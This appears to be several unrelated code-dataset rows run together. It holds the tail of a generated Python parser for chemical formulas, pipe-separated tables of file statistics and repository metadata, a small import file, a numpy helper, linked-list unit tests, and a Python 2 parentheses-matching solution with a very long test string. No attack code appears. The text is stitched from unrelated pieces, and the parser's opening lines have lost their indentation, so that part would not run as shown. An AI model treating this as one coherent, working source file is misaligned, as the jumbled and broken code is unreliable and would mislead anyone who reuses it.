if chunk66 == 'Cs':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cs"')
if address0 is FAILURE:
self._offset = index1
chunk67 = None
if self._offset < self._input_size:
chunk67 = self._input[self._offset:self._offset + 2]
if chunk67 == 'Cr':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cr"')
if address0 is FAILURE:
self._offset = index1
chunk68 = None
if self._offset < self._input_size:
chunk68 = self._input[self._offset:self._offset + 2]
if chunk68 == 'Co':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Co"')
if address0 is FAILURE:
self._offset = index1
chunk69 = None
if self._offset < self._input_size:
chunk69 = self._input[self._offset:self._offset + 2]
if chunk69 == 'Cl':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cl"')
if address0 is FAILURE:
self._offset = index1
chunk70 = None
if self._offset < self._input_size:
chunk70 = self._input[self._offset:self._offset + 2]
if chunk70 == 'Ce':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ce"')
if address0 is FAILURE:
self._offset = index1
chunk71 = None
if self._offset < self._input_size:
chunk71 = self._input[self._offset:self._offset + 2]
if chunk71 == 'Cd':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Cd"')
if address0 is FAILURE:
self._offset = index1
chunk72 = None
if self._offset < self._input_size:
chunk72 = self._input[self._offset:self._offset + 2]
if chunk72 == 'Ca':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ca"')
if address0 is FAILURE:
self._offset = index1
chunk73 = None
if self._offset < self._input_size:
chunk73 = self._input[self._offset:self._offset + 1]
if chunk73 == 'C':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"C"')
if address0 is FAILURE:
self._offset = index1
chunk74 = None
if self._offset < self._input_size:
chunk74 = self._input[self._offset:self._offset + 2]
if chunk74 == 'Br':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Br"')
if address0 is FAILURE:
self._offset = index1
chunk75 = None
if self._offset < self._input_size:
chunk75 = self._input[self._offset:self._offset + 2]
if chunk75 == 'Bi':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Bi"')
if address0 is FAILURE:
self._offset = index1
chunk76 = None
if self._offset < self._input_size:
chunk76 = self._input[self._offset:self._offset + 2]
if chunk76 == 'Be':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Be"')
if address0 is FAILURE:
self._offset = index1
chunk77 = None
if self._offset < self._input_size:
chunk77 = self._input[self._offset:self._offset + 2]
if chunk77 == 'Ba':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ba"')
if address0 is FAILURE:
self._offset = index1
chunk78 = None
if self._offset < self._input_size:
chunk78 = self._input[self._offset:self._offset + 1]
if chunk78 == 'B':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"B"')
if address0 is FAILURE:
self._offset = index1
chunk79 = None
if self._offset < self._input_size:
chunk79 = self._input[self._offset:self._offset + 2]
if chunk79 == 'Au':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Au"')
if address0 is FAILURE:
self._offset = index1
chunk80 = None
if self._offset < self._input_size:
chunk80 = self._input[self._offset:self._offset + 2]
if chunk80 == 'As':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"As"')
if address0 is FAILURE:
self._offset = index1
chunk81 = None
if self._offset < self._input_size:
chunk81 = self._input[self._offset:self._offset + 2]
if chunk81 == 'Ar':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ar"')
if address0 is FAILURE:
self._offset = index1
chunk82 = None
if self._offset < self._input_size:
chunk82 = self._input[self._offset:self._offset + 2]
if chunk82 == 'Al':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Al"')
if address0 is FAILURE:
self._offset = index1
chunk83 = None
if self._offset < self._input_size:
chunk83 = self._input[self._offset:self._offset + 2]
if chunk83 == 'Ag':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 2)
self._offset = self._offset + 2
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"Ag"')
if address0 is FAILURE:
self._offset = index1
chunk84 = None
if self._offset < self._input_size:
chunk84 = self._input[self._offset:self._offset + 1]
if chunk84 == 'e':
address0 = self._actions.make_element(self._input, self._offset, self._offset + 1)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"e"')
if address0 is FAILURE:
self._offset = index1
self._cache['element'][index0] = (address0, self._offset)
return address0
def _read_count(self):
    """Parse an optional count (a number); succeed with an empty node if absent."""
    start = self._offset
    cached = self._cache['count'].get(start)
    if cached:
        self._offset = cached[1]
        return cached[0]
    mark = self._offset
    node = self._read_n()
    if node is FAILURE:
        # Counts are optional: rewind and succeed with a zero-width node.
        self._offset = mark
        node = TreeNode(self._input[mark:mark], mark)
    self._cache['count'][start] = (node, self._offset)
    return node
def _read_n(self):
    """Parse a natural number: one non-zero digit followed by zero or more digits."""
    start = self._offset
    cached = self._cache['n'].get(start)
    if cached:
        self._offset = cached[1]
        return cached[0]
    first = self._read_non_zero_digit()
    if first is FAILURE:
        # Leading digit missing: rewind and fail the whole rule.
        self._offset = start
        result = FAILURE
    else:
        # Greedily collect trailing digits; a zero-or-more repetition
        # can never fail, so this always yields a (possibly empty) node.
        rest_start = self._offset
        digits = []
        while True:
            d = self._read_digit()
            if d is FAILURE:
                break
            digits.append(d)
        rest = TreeNode(self._input[rest_start:self._offset], rest_start, digits)
        result = TreeNode2(self._input[start:self._offset], start, [first, rest])
    self._cache['n'][start] = (result, self._offset)
    return result
def _read_non_zero_digit(self):
    """Parse a single character matching [1-9]."""
    start = self._offset
    cached = self._cache['non_zero_digit'].get(start)
    if cached:
        self._offset = cached[1]
        return cached[0]
    ch = None
    if self._offset < self._input_size:
        ch = self._input[self._offset:self._offset + 1]
    if ch is not None and Grammar.REGEX_1.search(ch):
        node = TreeNode(ch, start)
        self._offset = start + 1
    else:
        node = FAILURE
        # Record the furthest failure position for error reporting.
        if self._offset > self._failure:
            self._failure = self._offset
            self._expected = []
        if self._offset == self._failure:
            self._expected.append('[1-9]')
    self._cache['non_zero_digit'][start] = (node, self._offset)
    return node
def _read_digit(self):
    """Parse a single character matching [0-9]."""
    start = self._offset
    cached = self._cache['digit'].get(start)
    if cached:
        self._offset = cached[1]
        return cached[0]
    ch = None
    if self._offset < self._input_size:
        ch = self._input[self._offset:self._offset + 1]
    if ch is not None and Grammar.REGEX_2.search(ch):
        node = TreeNode(ch, start)
        self._offset = start + 1
    else:
        node = FAILURE
        # Record the furthest failure position for error reporting.
        if self._offset > self._failure:
            self._failure = self._offset
            self._expected = []
        if self._offset == self._failure:
            self._expected.append('[0-9]')
    self._cache['digit'][start] = (node, self._offset)
    return node
class Parser(Grammar):
    """Drives the generated Grammar over one complete input string."""

    def __init__(self, input, actions, types):
        # Parsing state: current position, memoization cache, and the
        # furthest-failure bookkeeping used to build error messages.
        self._input = input
        self._input_size = len(input)
        self._actions = actions
        self._types = types
        self._offset = 0
        self._failure = 0
        self._expected = []
        self._cache = defaultdict(dict)

    def parse(self):
        """Parse the entire input as a formula.

        Returns the parse tree on success; raises ParseError when the
        grammar fails or does not consume the whole input.
        """
        tree = self._read_formula()
        if tree is not FAILURE and self._offset == self._input_size:
            return tree
        if not self._expected:
            # Parse succeeded but input remained: report expected EOF.
            self._failure = self._offset
            self._expected.append('<EOF>')
        raise ParseError(format_error(self._input, self._failure, self._expected))
def format_error(input, offset, expected):
    """Build a human-readable error message with a caret under *offset*.

    The message shows the 1-based line number, the expected tokens, the
    offending line, and a '^' aligned under the failing column.
    """
    lines = input.split('\n')
    line_no = 0
    position = 0
    # Advance line by line until the running position passes the offset.
    while position <= offset:
        position += len(lines[line_no]) + 1
        line_no += 1
    line = lines[line_no - 1]
    position -= len(line) + 1  # rewind to the start of the failing line
    caret_pad = ' ' * (offset - position)
    header = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected)
    return header + '\n' + line + '\n' + caret_pad + '^'
def parse(input, actions=None, types=None):
    """Convenience entry point: parse *input* with a fresh Parser instance."""
    return Parser(input, actions, types).parse()
| 182.804247
| 430
| 0.121284
| 6,473
| 275,486
| 4.841804
| 0.039703
| 0.320666
| 0.276507
| 0.170384
| 0.887879
| 0.878785
| 0.874892
| 0.699212
| 0.600619
| 0.592642
| 0
| 0.032056
| 0.856642
| 275,486
| 1,506
| 431
| 182.925631
| 0.761527
| 0
| 0
| 0.707432
| 0
| 0
| 0.00224
| 0
| 0.000676
| 0
| 0
| 0
| 0
| 1
| 0.010135
| false
| 0.000676
| 0.001351
| 0
| 0.028378
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
82e21f1eabb3a652530f51887a6b3f0a6a94f7f2
| 143
|
py
|
Python
|
dswizard/optimizers/bandit_learners/__init__.py
|
Ennosigaeon/dswizzard
|
cb7d2f3add5890f2747b362586781cddc2edfb33
|
[
"BSD-3-Clause"
] | 2
|
2021-01-27T12:55:14.000Z
|
2021-04-20T14:50:46.000Z
|
dswizard/optimizers/bandit_learners/__init__.py
|
Ennosigaeon/dswizard
|
2628baab86f4d60274966351d5b5a3737723621c
|
[
"BSD-3-Clause"
] | null | null | null |
dswizard/optimizers/bandit_learners/__init__.py
|
Ennosigaeon/dswizard
|
2628baab86f4d60274966351d5b5a3737723621c
|
[
"BSD-3-Clause"
] | null | null | null |
from dswizard.optimizers.bandit_learners.hyperband import HyperbandLearner
from dswizard.optimizers.bandit_learners.pseudo import PseudoBandit
| 47.666667
| 74
| 0.902098
| 16
| 143
| 7.9375
| 0.625
| 0.188976
| 0.346457
| 0.440945
| 0.566929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055944
| 143
| 2
| 75
| 71.5
| 0.940741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d5f87aebc5a80430a2c97ef7416a9a133596802
| 94
|
py
|
Python
|
findMultiplesOf.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
findMultiplesOf.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
findMultiplesOf.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
import numpy as np


def findMultiplesOf(begin, end, n):
    """Return an array stepping by *n* from *begin* (inclusive) to *end* (exclusive).

    NOTE(review): despite the name, the values are begin, begin + n, ... —
    they are multiples of n only when *begin* itself is one; confirm intent
    against callers.
    """
    return np.arange(begin, end, n)
| 23.5
| 37
| 0.691489
| 15
| 94
| 4.333333
| 0.733333
| 0.246154
| 0.276923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202128
| 94
| 4
| 38
| 23.5
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
7d7ae1b0be78817d639b152627f10c5947bf8333
| 2,427
|
py
|
Python
|
honlib/tests/data_structures/test_linked_list.py
|
jsphon/honlib
|
3538f2563039f1cc3ff3d4a49a8caf5afcf693a9
|
[
"MIT"
] | null | null | null |
honlib/tests/data_structures/test_linked_list.py
|
jsphon/honlib
|
3538f2563039f1cc3ff3d4a49a8caf5afcf693a9
|
[
"MIT"
] | null | null | null |
honlib/tests/data_structures/test_linked_list.py
|
jsphon/honlib
|
3538f2563039f1cc3ff3d4a49a8caf5afcf693a9
|
[
"MIT"
] | null | null | null |
import unittest
from honlib.data_structures import linked_list
class LinkedListTestCase(unittest.TestCase):
    """Behavioral tests for linked_list.LinkedList."""

    def test_clear(self):
        ll = linked_list.LinkedList()
        ll.append(1)
        self.assertEqual((1,), ll.to_tuple())
        ll.clear()
        self.assertEqual(tuple(), ll.to_tuple())

    def test_bool_is_false(self):
        # An empty list is falsy.
        self.assertFalse(bool(linked_list.LinkedList()))

    def test_bool_is_true(self):
        # A list with any node (even value 0) is truthy.
        ll = linked_list.LinkedList()
        ll.append(0)
        self.assertTrue(bool(ll))

    def test_append(self):
        ll = linked_list.LinkedList()
        for value in (1, 2, 3):
            ll.append(value)
        nodes = list(ll)
        self.assertEqual(3, len(nodes))
        # Iteration yields node objects; payload lives in .v
        for position, expected in enumerate((1, 2, 3)):
            self.assertEqual(expected, nodes[position].v)

    def test_to_tuple(self):
        ll = linked_list.LinkedList()
        for value in (1, 2, 3):
            ll.append(value)
        self.assertEqual((1, 2, 3), ll.to_tuple())
class DoublyLinkedListTestCase(unittest.TestCase):
    """Behavioral tests for linked_list.DoublyLinkedList."""

    def test_clear(self):
        vt = linked_list.DoublyLinkedList()
        vt.append(1)
        self.assertEqual((1,), vt.to_tuple())
        vt.clear()
        self.assertEqual(tuple(), vt.to_tuple())

    def test_bool_is_false(self):
        # An empty list is falsy.
        vt = linked_list.DoublyLinkedList()
        self.assertFalse(bool(vt))

    def test_bool_is_true(self):
        # A list with any node (even value 0) is truthy.
        vt = linked_list.DoublyLinkedList()
        vt.append(0)
        self.assertTrue(bool(vt))

    def test_append(self):
        vt = linked_list.DoublyLinkedList()
        vt.append(1)
        vt.append(2)
        vt.append(3)
        result = list(vt)
        self.assertEqual(3, len(result))
        # Iteration yields node objects; payload lives in .v
        self.assertEqual(1, result[0].v)
        self.assertEqual(2, result[1].v)
        self.assertEqual(3, result[2].v)

    def test_to_tuple(self):
        vt = linked_list.DoublyLinkedList()
        vt.append(1)
        vt.append(2)
        vt.append(3)
        self.assertEqual((1, 2, 3), vt.to_tuple())

    def test_reversed(self):
        vt = linked_list.DoublyLinkedList()
        vt.append(1)
        vt.append(2)
        vt.append(3)
        result = list(reversed(vt))
        self.assertEqual(3, result[0].v)
        self.assertEqual(2, result[1].v)
        # Fixed: was result[1].v, which contradicted the assertion above
        # and would always fail; the last reversed element is result[2].
        self.assertEqual(1, result[2].v)
| 22.682243
| 50
| 0.587557
| 310
| 2,427
| 4.470968
| 0.119355
| 0.109668
| 0.095238
| 0.126984
| 0.887446
| 0.868687
| 0.868687
| 0.849928
| 0.831169
| 0.767677
| 0
| 0.026965
| 0.281829
| 2,427
| 106
| 51
| 22.896226
| 0.768216
| 0
| 0
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.287671
| 1
| 0.150685
| false
| 0
| 0.027397
| 0
| 0.205479
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d8d48e6386846b6ed6915518619b0aa0ff426f0
| 15,956
|
py
|
Python
|
0/longest_valid_parentheses.py
|
IronCore864/leetcode
|
a62a4cdde9814ae48997176debcaad537f7ad01f
|
[
"Apache-2.0"
] | 4
|
2018-03-07T02:56:03.000Z
|
2021-06-15T05:43:31.000Z
|
0/longest_valid_parentheses.py
|
IronCore864/leetcode
|
a62a4cdde9814ae48997176debcaad537f7ad01f
|
[
"Apache-2.0"
] | null | null | null |
0/longest_valid_parentheses.py
|
IronCore864/leetcode
|
a62a4cdde9814ae48997176debcaad537f7ad01f
|
[
"Apache-2.0"
] | 1
|
2021-09-02T12:05:15.000Z
|
2021-09-02T12:05:15.000Z
|
class Solution(object):
    def longestValidParentheses(self, s):
        """Return the length of the longest valid (well-formed) parentheses substring.

        :type s: str
        :rtype: int
        """
        if not s:
            return 0
        best = 0
        last_unmatched = -1     # index of the most recent unmatched ')'
        open_positions = []     # stack of indices of unmatched '('
        for idx, ch in enumerate(s):
            if ch == '(':
                open_positions.append(idx)
            elif not open_positions:
                # Unmatched ')': everything before it can't extend a span.
                last_unmatched = idx
            else:
                open_positions.pop()
                if open_positions:
                    # Valid span runs from just after the last open '('.
                    best = max(best, idx - open_positions[-1])
                else:
                    # Valid span runs from just after the last bad ')'.
                    best = max(best, idx - last_unmatched)
        return best
# Ad-hoc smoke tests (Python 2 print statements; this file predates print()).
s = Solution()
print s.longestValidParentheses("(()")        # expect 2
print s.longestValidParentheses(")()())")     # expect 4
print s.longestValidParentheses("())")        # expect 2
print s.longestValidParentheses(")(((((()())()()))()(()))(")  # long mixed case
print s.longestValidParentheses("()((())()")  # expect 6: "(())()" at indices 3-8
print s.longestValidParentheses(
"(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((